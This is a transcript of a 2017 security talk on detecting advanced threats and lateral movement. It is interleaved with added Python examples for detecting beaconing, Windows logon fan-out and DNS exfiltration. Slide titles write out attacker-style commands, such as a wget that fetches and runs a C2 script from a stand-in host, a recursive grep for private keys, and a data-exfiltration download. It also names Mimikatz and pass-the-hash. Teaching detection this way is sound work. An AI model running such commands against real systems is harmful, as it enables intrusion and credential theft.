
Advanced Threats and Lateral Movement Detection

Jan 26, 2017


Greg Foss
Transcript
Page 1: Advanced Threats and Lateral Movement Detection

Advanced Threats & Lateral Movement Detection
Greg Foss – OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
Sr. Security Research Engineer, LogRhythm Labs

Page 2: Advanced Threats and Lateral Movement Detection

# whoami

• Greg Foss
• Sr. Security Researcher
• LogRhythm Labs – Threat Intel Team
• Former DOE Penetration Tester
• Focus => Honeypots, Incident Response, and Red Team
• OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, etc…

Page 3: Advanced Threats and Lateral Movement Detection

# ls -lha

1. IT Security Threats
2. Event Correlation
3. Detection
4. DEMO!

Page 4: Advanced Threats and Lateral Movement Detection


Page 5: Advanced Threats and Lateral Movement Detection

# man [Advanced Threats]

• Advanced Persistent Threats
• Organized Cyber Crime
• Hacktivists
• ‘Cyber Terrorists’
• Etc…

• Able to develop and utilize sophisticated techniques in pursuit of their target objective, from reconnaissance to data exfiltration.
• Will leverage the full spectrum of attack vectors – social, technical, physical, etc.
• Highly organized, highly motivated, highly resourced.
• Willing to invest significant time and resources to compromise.

Page 6: Advanced Threats and Lateral Movement Detection

It’s when, not if…

• Mission Oriented
• Persistent and Driven
• Patient and Methodical
• Focus on exponential ROI
• Emphasis on high IP value targets
• They will get in…

Image: http://postfiles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg

Page 7: Advanced Threats and Lateral Movement Detection

Identify a ‘Hacker’

Page 8: Advanced Threats and Lateral Movement Detection

Ok, for real…

• *Simple… Correlate on odd network / host activity
• Use the data at hand to actively detect anomalies
• Understand how your organization will respond to a breach / outage / squirrel affecting any of the three InfoSec pillars
  • Confidentiality
  • Integrity
  • Availability

Page 9: Advanced Threats and Lateral Movement Detection

Advanced Threat Tactics and Evasion

• Threat actors of all types move slowly and quietly over time, limiting exposure and the potential for discovery.
• Trending on enterprise data over time helps to build baselines that can be used to actively identify anomalies.

Page 10: Advanced Threats and Lateral Movement Detection

IT  Security  Threats  


Page 11: Advanced Threats and Lateral Movement Detection

# last && echo ‘How are they getting in??’

• Phishing
  • 91% of ‘advanced’ attacks began with a phishing email or similar social engineering tactics.
  • http://www.infosecurity-magazine.com/view/29562/91-of-apt-attacks-start-with-a-spearphishing-email/

• 2014 Metrics
  • Average cost per breach => $3.5 million
  • 15% higher than the previous year
  • http://www.ponemon.org/blog/ponemon-institute-releases-2014-cost-of-data-breach-global-analysis

Page 12: Advanced Threats and Lateral Movement Detection


Page 13: Advanced Threats and Lateral Movement Detection

# history | more

• It only takes one…

Page 14: Advanced Threats and Lateral Movement Detection

# ./searchsploit ‘client side’ && echo ‘new exploits daily!’

Page 15: Advanced Threats and Lateral Movement Detection

# cat [cve-2014-6332] >> /var/www/pwn-IE.html

Page 16: Advanced Threats and Lateral Movement Detection

Event Correlation & Detection

Page 17: Advanced Threats and Lateral Movement Detection

Defense in Depth

Page 18: Advanced Threats and Lateral Movement Detection

Spear Phishing

Page 19: Advanced Threats and Lateral Movement Detection

Phishing Attack Log Traces

Page 20: Advanced Threats and Lateral Movement Detection

$ vim next.sh

• Maintain Access…

Image: http://www.netresec.com/images/back_door_open_300x200.png

Page 21: Advanced Threats and Lateral Movement Detection

$ ./next.sh

• Then?
• *Nothing…
• For a long time…
  • *not really*
• They have attained a foothold and are now your newest employees…

Page 22: Advanced Threats and Lateral Movement Detection

$ su - root

Page 23: Advanced Threats and Lateral Movement Detection

# wget http://bad.stuff.net/c2.py . && ./c2.py

• Once infected, the beachhead will beacon periodically

Page 24: Advanced Threats and Lateral Movement Detection

Behavioral Analytics

• Beaconing Activity – Usually initiated over port 443 or an encrypted tunnel over port 80.
• Can be detected with a Firewall or Web Proxy
  • Capability to decrypt SSL traffic is a huge plus
• Behavioral analytics can be utilized to differentiate normal browsing activity from possible evidence of an infected host.
  • Using a SIEM, track the unique websites usually visited, and the overall volume of normal web activity, on a per user and a per host basis.
  • Watch for significant changes over an extended period of time.
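One way to operationalize the beaconing point above, as an added example that is not part of the deck or of LogRhythm's product: group proxy requests by (source host, destination), then measure how regular the gaps between requests are. A sleep-loop implant produces near-constant intervals and near-constant request sizes; a person reading news does not. The log format, hostnames and thresholds below are all constructed for this example.

```python
# Added example (not from the deck or LogRhythm): beacon detection over proxy logs.
# Assumptions: the log format below is constructed for this example, and the
# thresholds (min_hits, max_cv, max_size_spread) are illustrative starting points.
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample proxy log: "<ISO timestamp> <source host> <destination> <bytes sent>".
# ws-17 talks to cdn.example-update.net every ~300 s with ~512-byte requests
# (implant check-in); everything else is ordinary, bursty browsing.
SAMPLE_LOG = """\
2017-01-26T09:00:00 ws-17 cdn.example-update.net 512
2017-01-26T09:01:13 ws-17 intranet.corp.local 2048
2017-01-26T09:05:00 ws-17 cdn.example-update.net 511
2017-01-26T09:10:01 ws-17 cdn.example-update.net 513
2017-01-26T09:12:40 ws-17 news.example.org 90211
2017-01-26T09:15:00 ws-17 cdn.example-update.net 512
2017-01-26T09:20:00 ws-17 cdn.example-update.net 512
2017-01-26T09:25:01 ws-17 cdn.example-update.net 510
2017-01-26T09:03:22 ws-04 news.example.org 70311
2017-01-26T09:18:05 ws-04 news.example.org 61000
2017-01-26T09:31:50 ws-04 mail.example.com 4100
2017-01-26T09:44:12 ws-04 news.example.org 88000
"""


def parse(log_text):
    """Yield (timestamp, host, destination, bytes) from the constructed log format."""
    for line in log_text.strip().splitlines():
        ts, host, dest, nbytes = line.split()
        yield datetime.fromisoformat(ts), host, dest, int(nbytes)


def find_beacons(log_text, min_hits=5, max_cv=0.15, max_size_spread=0.10):
    """Return (host, destination) pairs whose request timing is machine-regular.

    cv = stdev / mean of the inter-request gaps. Human browsing is bursty (cv well
    above 1); a sleep-loop implant produces near-constant gaps (cv near 0, unless
    it adds jitter, which is why max_cv is tunable). Near-constant request sizes
    are a second indicator: a check-in with no tasking is the same bytes every time.
    """
    by_pair = defaultdict(list)
    for ts, host, dest, nbytes in parse(log_text):
        by_pair[(host, dest)].append((ts, nbytes))

    findings = []
    for (host, dest), hits in by_pair.items():
        if len(hits) < min_hits:          # too few samples to call it a rhythm
            continue
        hits.sort()
        gaps = [(b - a).total_seconds() for (a, _), (b, _) in zip(hits, hits[1:])]
        sizes = [n for _, n in hits]
        cv = pstdev(gaps) / mean(gaps)
        size_spread = (max(sizes) - min(sizes)) / mean(sizes)
        if cv <= max_cv and size_spread <= max_size_spread:
            findings.append({"host": host, "dest": dest, "hits": len(hits),
                             "period_s": round(mean(gaps)), "cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"possible beacon: {f['host']} -> {f['dest']} every ~{f['period_s']}s "
              f"({f['hits']} hits, cv={f['cv']})")
```

The same per-host grouping is what a SIEM baseline of "unique sites visited" and "bytes per day" is built on; once a week or two of data is in, the per-host counts become the baseline the slide refers to and the same loop can flag a host whose destination count or volume departs from it.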

Page 25: Advanced Threats and Lateral Movement Detection

Reconnaissance

• Ping sweeps, service discovery, etc. – NO
• Why make unnecessary noise?
• Instead => access network shares, web apps, and services
• Passively gather information using available resources…

Image: http://macheads101.com/pages/pics/download_pics/mac/portscan.png

Page 26: Advanced Threats and Lateral Movement Detection

Lateral Movement

• Dump Local System Hashes
  • Maybe crack them, maybe it’s not even necessary…
• Pass the Hash (PtH)
• Dump plain text passwords
  • Mimikatz -- FTW!
• Act as an internal employee -- use legitimate means to access resources.

Page 27: Advanced Threats and Lateral Movement Detection

Uncovering Internal Reconnaissance and Pivoting

• Security Operations Goal => Reduce MTTD and MTTR
  • MTTD – Mean Time to Detect
  • MTTR – Mean Time to Respond
• Set Traps => Honeypot / Honey Token access
• Overt Clues => Modification of user / file / group permissions and pivoting evidence
• Subtle Clues => VPN access from disparate geographical locations
• Missed Opportunities => Once inside, they are now an ‘employee’…

Page 28: Advanced Threats and Lateral Movement Detection

Lateral Movement Log Traces

• Microsoft’s granular Event Identification schema (EVID), in conjunction with environment information, provides analysts with plenty of information to track attackers once they have breached the perimeter.
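As an added example of the kind of EVID correlation the slide describes (this is not the deck's demo and not a LogRhythm rule), the block below joins three Windows Security event IDs: 4624 network logons (LogonType 3) grouped by account and source IP to spot one credential fanning out across many hosts in a short window, 4672 to see where that credential landed an admin-equivalent token, and 4732 for the "overt clue" from the previous slide, a local group membership change. The events, hostnames, IPs, window and host threshold are constructed for this example.

```python
# Added example (not the deck's demo or LogRhythm's rules): correlating Windows
# Security event IDs to surface lateral-movement fan-out and overt privilege changes.
# Assumptions: events are constructed below as already-parsed dicts using the field
# names from the Windows Security log; the window and host threshold are illustrative.
# Event IDs used (Vista/2008+ schema):
#   4624  successful logon; LogonType 3 = network logon (SMB, admin shares, WMI, etc.)
#   4672  special privileges assigned to new logon (admin-equivalent token on the target)
#   4732  member added to a security-enabled local group (4728/4756: global/universal)
from collections import defaultdict
from datetime import datetime, timedelta


def ev(event_id, minute, computer, **fields):
    """Build one constructed event; 'minute' is minutes past 14:00 on 2017-01-26."""
    return {"EventID": event_id, "Computer": computer,
            "TimeCreated": datetime(2017, 1, 26, 14, 0) + timedelta(minutes=minute),
            **fields}


EVENTS = [
    # Normal: asmith mounts a share on the file server twice, Kerberos, one host.
    ev(4624, 1, "SRV-FS01", TargetDomainName="CORP", TargetUserName="asmith",
       IpAddress="10.1.6.40", LogonType="3", AuthenticationPackageName="Kerberos"),
    ev(4624, 45, "SRV-FS01", TargetDomainName="CORP", TargetUserName="asmith",
       IpAddress="10.1.6.40", LogonType="3", AuthenticationPackageName="Kerberos"),
    # Suspicious: jdoe's workstation reaches four hosts in six minutes over NTLM,
    # lands admin-equivalent tokens on two of them, and adds itself to local Administrators.
    ev(4624, 10, "SRV-FS01", TargetDomainName="CORP", TargetUserName="jdoe",
       IpAddress="10.1.5.23", LogonType="3", AuthenticationPackageName="NTLM"),
    ev(4672, 10, "SRV-FS01", SubjectDomainName="CORP", SubjectUserName="jdoe"),
    ev(4624, 12, "SRV-DB02", TargetDomainName="CORP", TargetUserName="jdoe",
       IpAddress="10.1.5.23", LogonType="3", AuthenticationPackageName="NTLM"),
    ev(4672, 12, "SRV-DB02", SubjectDomainName="CORP", SubjectUserName="jdoe"),
    ev(4732, 13, "SRV-DB02", SubjectDomainName="CORP", SubjectUserName="jdoe",
       MemberName="CORP\\jdoe", TargetUserName="Administrators"),   # MemberName simplified
    ev(4624, 14, "WS-ADMIN03", TargetDomainName="CORP", TargetUserName="jdoe",
       IpAddress="10.1.5.23", LogonType="3", AuthenticationPackageName="NTLM"),
    ev(4624, 16, "SRV-WEB04", TargetDomainName="CORP", TargetUserName="jdoe",
       IpAddress="10.1.5.23", LogonType="3", AuthenticationPackageName="NTLM"),
]


def network_logons(events):
    """Group 4624 network logons by (DOMAIN\\account, source IP)."""
    groups = defaultdict(list)
    for e in events:
        if e["EventID"] == 4624 and e.get("LogonType") == "3":
            groups[(f'{e["TargetDomainName"]}\\{e["TargetUserName"]}', e["IpAddress"])].append(e)
    return groups


def admin_logons(events):
    """Map DOMAIN\\account -> set of hosts where it received a 4672 privileged token."""
    hosts = defaultdict(set)
    for e in events:
        if e["EventID"] == 4672:
            hosts[f'{e["SubjectDomainName"]}\\{e["SubjectUserName"]}'].add(e["Computer"])
    return hosts


def fanout_alerts(events, window_minutes=10, min_hosts=3):
    """Flag one account+source touching >= min_hosts distinct hosts inside the window.

    A user's workstation rarely opens network sessions to several servers in quick
    succession; an operator walking the network with a reused credential does.
    """
    window = timedelta(minutes=window_minutes)
    admins = admin_logons(events)
    alerts = []
    for (account, ip), logons in network_logons(events).items():
        logons.sort(key=lambda e: e["TimeCreated"])
        best = set()
        for i, first in enumerate(logons):      # sliding window anchored at each logon
            span = {e["Computer"] for e in logons[i:]
                    if e["TimeCreated"] - first["TimeCreated"] <= window}
            if len(span) > len(best):
                best = span
        if len(best) >= min_hosts:
            alerts.append({
                "account": account, "source_ip": ip, "hosts": sorted(best),
                # NTLM in a Kerberos-first estate is a common pass-the-hash tell
                "ntlm": any(e.get("AuthenticationPackageName") == "NTLM" for e in logons),
                "admin_on": sorted(admins.get(account, set()) & best),
            })
    return alerts


def privilege_change_alerts(events):
    """Overt clue from the previous slide: group-membership changes, attributed to who made them."""
    return [{"computer": e["Computer"], "group": e["TargetUserName"], "member": e["MemberName"],
             "by": f'{e["SubjectDomainName"]}\\{e["SubjectUserName"]}'}
            for e in events if e["EventID"] in (4728, 4732, 4756)]
```

The fan-out rule deliberately keys on the source IP as well as the account: a service account that legitimately touches many hosts does so from its own server, and a single workstation suddenly doing the same is the signal. Tune `min_hosts` against what your jump hosts and scanners actually do before alerting on it.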

Page 29: Advanced Threats and Lateral Movement Detection

Passive Data Extraction

• Well Poisoning via UNC Paths
• SMB Relay
• Help Desk Tickets
• Responder – By SpiderLabs
• Keylogging

Page 30: Advanced Threats and Lateral Movement Detection

Passive Traffic Analysis

• Analyze / capture anything that comes across the wire.
• ARP poison hosts of interest, take over switches/routers, etc.

Image: https://i.chzbgr.com/maxW500/5579525376/h7D009AE4/

Page 31: Advanced Threats and Lateral Movement Detection

# grep -rhi ‘private key’ /* && echo “Identify Key Resources”

• Keys / Certificates / Passwords
• File Shares and Databases
• Intellectual Property
• Domain Controllers / Exchange / etc.
• Business Leaders – CXO, Director, VP, etc.
  • Administrative Assistants

Image: http://www.mobilemarketingwatch.com/wordpress/wp-content/uploads/2011/07/Top-Secret-Tip-To-Pick-SMS-Keyword.jpeg

Page 32: Advanced Threats and Lateral Movement Detection

# wget http://target/files.tgz && echo “Data Exfiltration”

• Target data identified, gathered, and moved out of the environment.
• Data is normally leaked in a ‘hidden’ or modified format; rarely is the actual document extracted.
• Emails and Employee PII
• Intellectual Property
• Trade Secrets

Image: http://www.csee.umbc.edu/wp-content/uploads/2013/04/ex.jpg

Page 33: Advanced Threats and Lateral Movement Detection

Data Exfiltration is Often Not ‘Advanced’

Page 34: Advanced Threats and Lateral Movement Detection

Catching Data Exfiltration

• Granular restrictions on sensitive files and directories to specific groups or individuals; alert on any abnormal file access / read / write / etc.
• DNS exfiltration, or sometimes even ICMP Tunneling in high security environments
• Non-SSL over ports 443 / 8443, encrypted TCP over ports 80 / 8080
• Abnormal web server activity, newly created files, etc.
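Two of the channels above lend themselves to simple checks, shown here as an added example (not the deck's demo). For DNS exfiltration, the tell is volume of unique, long, high-entropy subdomain labels under one base domain from one client, because a tunnel must make every query unique to defeat caching and packs as many bytes as it can into each label. For "non-SSL over 443" and "encrypted TCP over 80", the check is whether the first bytes of the client's first packet actually open a TLS ClientHello or an HTTP request line. The DNS log, the packet byte strings, the thresholds and the last-two-labels base-domain heuristic are all constructed or simplified for this example.

```python
# Added example (not the deck's demo): two checks for the exfiltration channels on
# this slide. Assumptions: the DNS query log, the packet payloads and all thresholds
# are constructed for this example; the "last two labels" base-domain heuristic
# stands in for a public suffix list.
import math
from collections import Counter, defaultdict
from statistics import mean

# Constructed DNS query log: "<client IP> <queried name>". 10.1.5.23 is pushing
# 40-hex-char chunks of data out as subdomain labels; 10.1.6.40 hits a CDN that
# legitimately uses many short, low-entropy subdomains.
DNS_LOG = """\
10.1.5.23 www.example.com
10.1.5.23 mail.example.com
10.1.5.23 9f3a71c0e84b2d5a6e17f09cb3d4a8e2c5f16b07.tunnel.example-cdn.net
10.1.5.23 e2c5f16b079f3a71c0e84b2d5a6e17f09cb3d4a8.tunnel.example-cdn.net
10.1.5.23 b3d4a8e2c5f16b079f3a71c0e84b2d5a6e17f09c.tunnel.example-cdn.net
10.1.5.23 5a6e17f09cb3d4a8e2c5f16b079f3a71c0e84b2d.tunnel.example-cdn.net
10.1.6.40 www.example.com
10.1.6.40 api.example.com
10.1.6.40 a1.cdn-static.example.net
10.1.6.40 a2.cdn-static.example.net
10.1.6.40 a3.cdn-static.example.net
"""


def shannon_entropy(s):
    """Bits per character; hex/base32-encoded data sits near its alphabet's maximum."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_name(qname):
    """Return (leftmost label, base domain) using a last-two-labels heuristic."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[0], ".".join(labels[-2:])


def dns_exfil_suspects(log_text, min_unique=3, min_label_len=24, min_entropy=3.0):
    """Flag (client, base domain) pairs with many distinct, long, high-entropy labels.

    Legitimate names repeat (www, mail, a1..a3) and cache well; a DNS tunnel must
    make every query unique and packs as many bytes as it can into each label.
    """
    labels_by_pair = defaultdict(set)
    for line in log_text.strip().splitlines():
        client, qname = line.split()
        first, base = split_name(qname)
        labels_by_pair[(client, base)].add(first)

    suspects = []
    for (client, base), labels in labels_by_pair.items():
        if len(labels) < min_unique:
            continue
        avg_len = mean(len(l) for l in labels)
        avg_ent = mean(shannon_entropy(l) for l in labels)
        if avg_len >= min_label_len and avg_ent >= min_entropy:
            suspects.append({"client": client, "domain": base, "unique_labels": len(labels),
                             "mean_label_len": avg_len, "mean_entropy": round(avg_ent, 2)})
    return suspects


# Constructed first bytes of a client's first packet on a 443 / 80 session.
TLS_CLIENT_HELLO_PREFIX = bytes.fromhex("16030100a5010000a10303")  # TLS record + ClientHello
NOT_TLS_ON_443 = b"\x00\x00\x00\x1aSYNC\x00"                          # custom C2 framing
NOT_HTTP_ON_80 = b"\x17\x03\x03\x00\x45" + b"\x9b" * 5                # TLS app data on 80


def looks_like_tls(payload):
    """True if the bytes open a TLS handshake record carrying a ClientHello.

    Record header: type 0x16 (handshake), version 0x03 0x0X, 2-byte length; then
    handshake type 0x01. Caveat: SSLv2-style hellos and QUIC (UDP) look different;
    this is a sanity check for "is what's on 443 actually TLS", not a parser.
    """
    return (len(payload) >= 6 and payload[0] == 0x16 and payload[1] == 0x03
            and payload[2] <= 0x04 and payload[5] == 0x01)


def looks_like_http(payload):
    """True if the bytes open with an HTTP request line; anything else on 80 deserves a look."""
    methods = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ", b"PATCH ")
    return payload.startswith(methods)
```

Both byte checks only need the first packet of a flow, so they run fine on a span port or proxy without decrypting anything; pairing a "not TLS on 443" hit with the beacon-timing check from the earlier slide is what turns either weak signal into something worth an analyst's time.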

Page 35: Advanced Threats and Lateral Movement Detection

It all comes down to Event Correlation

Page 36: Advanced Threats and Lateral Movement Detection

DEMO

Page 37: Advanced Threats and Lateral Movement Detection

Closing Thoughts…

• Don’t be hard on the outside, soft and chewy on the inside…
• Implement Layer 3 (network) Segmentation and Least User Privilege
• Understand your environment and log data so that you can accurately correlate physical and cyber events
• Implement URL filtering, stateful packet inspection, and binary analysis
• Actively alert on and respond at the earliest signs of lateral movement and reconnaissance observed within your environment
• The earlier you can detect attackers the better…

Page 38: Advanced Threats and Lateral Movement Detection

Thank You!

QUESTIONS?

Greg Foss
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
Senior Security Research Engineer
Greg.Foss[at]logrhythm.com
@heinzarelli